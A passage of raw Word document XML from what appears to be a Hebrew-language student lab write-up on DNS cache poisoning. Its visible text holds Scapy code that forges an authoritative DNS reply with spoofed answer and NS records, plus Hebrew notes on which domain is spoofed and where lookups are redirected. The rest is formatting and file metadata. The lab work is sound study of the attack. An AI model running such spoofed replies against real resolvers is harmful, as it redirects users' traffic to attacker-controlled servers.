        <w:t>Anssec = DNSRR(rrname=name, type=’A’, rdata=’1.2.3.4’, ttl=259200)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                                         </w:t>
      </w:r>
      <w:r w:rsidRPr="004B46B7">
        <w:t xml:space="preserve"> NSsec = DNSRR(rrname=domain, type=’NS’, rdata=ns, ttl=259200) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC06072" w14:textId="77777777" w:rsidR="004B46B7" w:rsidRPr="004B46B7" w:rsidRDefault="004B46B7" w:rsidP="004B46B7">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004B46B7">
        <w:t>dns = DNS(id=0xAAAA, aa=1, rd=1, qr=1, qdcount=1, ancount=1, nscount=1, arcount=0, qd=Qdsec, an=Anssec, ns=NSsec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDABF20" w14:textId="4F067A7A" w:rsidR="004B46B7" w:rsidRPr="004B46B7" w:rsidRDefault="004B46B7" w:rsidP="004B46B7">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004B46B7">
        <w:t xml:space="preserve"> ip = IP(dst=</w:t>
      </w:r>
      <w:r w:rsidR="00444798">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B46B7">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="001801C5">
        <w:t>199.43.135.53</w:t>
      </w:r>
      <w:r w:rsidRPr="004B46B7">
        <w:t>’, src=</w:t>
      </w:r>
      <w:r w:rsidR="001E5FD7" w:rsidRPr="004B46B7">
        <w:t>'10.9.0.53’</w:t>
      </w:r>
      <w:r w:rsidR="001E5FD7">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D753E27" w14:textId="68CE5810" w:rsidR="004B46B7" w:rsidRPr="004B46B7" w:rsidRDefault="004B46B7" w:rsidP="00444798">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004B46B7">
        <w:t xml:space="preserve"> udp = UDP(dport=</w:t>
      </w:r>
      <w:r w:rsidR="001801C5">
        <w:t>33333</w:t>
      </w:r>
      <w:r w:rsidRPr="004B46B7">
        <w:t>, sport=</w:t>
      </w:r>
      <w:r w:rsidR="001801C5">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="004D3BED">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="004B46B7">
        <w:t xml:space="preserve">, chksum=0) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573DDE89" w14:textId="1BC7E286" w:rsidR="004B46B7" w:rsidRDefault="004B46B7" w:rsidP="004B46B7">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004B46B7">
        <w:t>reply = ip/udp/dns</w:t>
      </w:r>
      <w:r w:rsidR="00747EBB">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51579337" w14:textId="77777777" w:rsidR="00747EBB" w:rsidRDefault="00747EBB" w:rsidP="00747EBB">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>name-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> זה הדומיין שאנחנו רוצים להחזיר עליו תשובה בכדי לבצע את ההתקפה</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="555034DD" w14:textId="1F47C0A3" w:rsidR="00747EBB" w:rsidRDefault="00747EBB" w:rsidP="00747EBB">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Domain-  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> זה הוא הדומיין הראשי שאנחנו רוצים לזייף.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E08547" w14:textId="69EA8A0D" w:rsidR="00747EBB" w:rsidRDefault="00747EBB" w:rsidP="00747EBB">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ns- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הדומיין שאנחנו רוצים להעביר אליו</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C67D2BA" w14:textId="25393EEE" w:rsidR="00747EBB" w:rsidRDefault="00747EBB" w:rsidP="00747EBB">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>כל השאר זהה לקודם</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAC8450" w14:textId="77777777" w:rsidR="00747EBB" w:rsidRPr="004B46B7" w:rsidRDefault="00747EBB" w:rsidP="00747EBB">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00747EBB" w:rsidRPr="004B46B7" w:rsidSect="00D65F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23"/>
    <w:rsid w:val="00026B76"/>
    <w:rsid w:val="000412CE"/>
    <w:rsid w:val="001140A3"/>
    <w:rsid w:val="00132E23"/>
    <w:rsid w:val="001801C5"/>
    <w:rsid w:val="001E5FD7"/>
    <w:rsid w:val="002C2571"/>
    <w:rsid w:val="003C1263"/>
    <w:rsid w:val="00444798"/>
    <w:rsid w:val="004929AE"/>
    <w:rsid w:val="004B46B7"/>
    <w:rsid w:val="004D3BED"/>
    <w:rsid w:val="004E237F"/>
    <w:rsid w:val="00574690"/>
    <w:rsid w:val="005A23CB"/>
    <w:rsid w:val="005A559C"/>
    <w:rsid w:val="00682F52"/>
    <w:rsid w:val="00747EBB"/>
    <w:rsid w:val="00824212"/>
    <w:rsid w:val="00863A1D"/>
    <w:rsid w:val="008F1FD7"/>
    <w:rsid w:val="00903401"/>
    <w:rsid w:val="009D6D6F"/>
    <w:rsid w:val="00AC0099"/>
    <w:rsid w:val="00BE1F58"/>
    <w:rsid w:val="00D65F36"/>
    <w:rsid w:val="00D95EEA"/>
    <w:rsid w:val="00E9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C985"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B6320AAE-7D4C-4868-95A6-C262D959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32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32E23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132E23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132E23"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="כותרת 1 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00132E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5</Pages>
  <Words>363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אורית שמעון</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>אורית שמעון</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-06T09:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-09T07:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>